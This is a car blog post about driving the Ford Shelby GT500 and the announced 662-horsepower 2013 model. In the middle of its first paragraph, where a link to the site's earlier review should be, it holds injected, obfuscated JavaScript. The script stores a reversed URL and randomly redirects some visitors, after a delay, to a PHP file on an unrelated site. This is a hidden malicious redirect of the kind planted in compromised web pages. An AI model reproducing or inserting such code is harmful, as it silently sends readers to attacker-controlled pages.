We are big fans of the muscle bound Ford Shelby GT500 here at crankandpiston. Strangely though, our first drive of the current generation only materialised a few weeks ago, when the lovely Marketing Manager here in Middle East threw the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/shelby-gt500-mustang-borrowing-the-keys/”>keys at us for a day and a night of fun. We could help but laugh uncontrollably as we lite the rears up at every given opportunity and mooched around the streets of Dubai, riding the wave of tourque the big Mustang had in reserve. Now after we handed the keys back, we to talking about the up and coming 2013 car and just how insane a Shelby Gt500 would be with any more power.
Well, the details are out and Ford clearly aren’t scared at all. How does 662 horsepower and 630 lb-ft of torque sound? Put that into context for a second – Put simply, it’s one more cheeky little HP than a Ferrari 599 GTO. All tucked up in a showroom ready pony car. Yup.. Ford are on the case for the people and we salute them.
Utter insanity and we can’t wait to sample it.
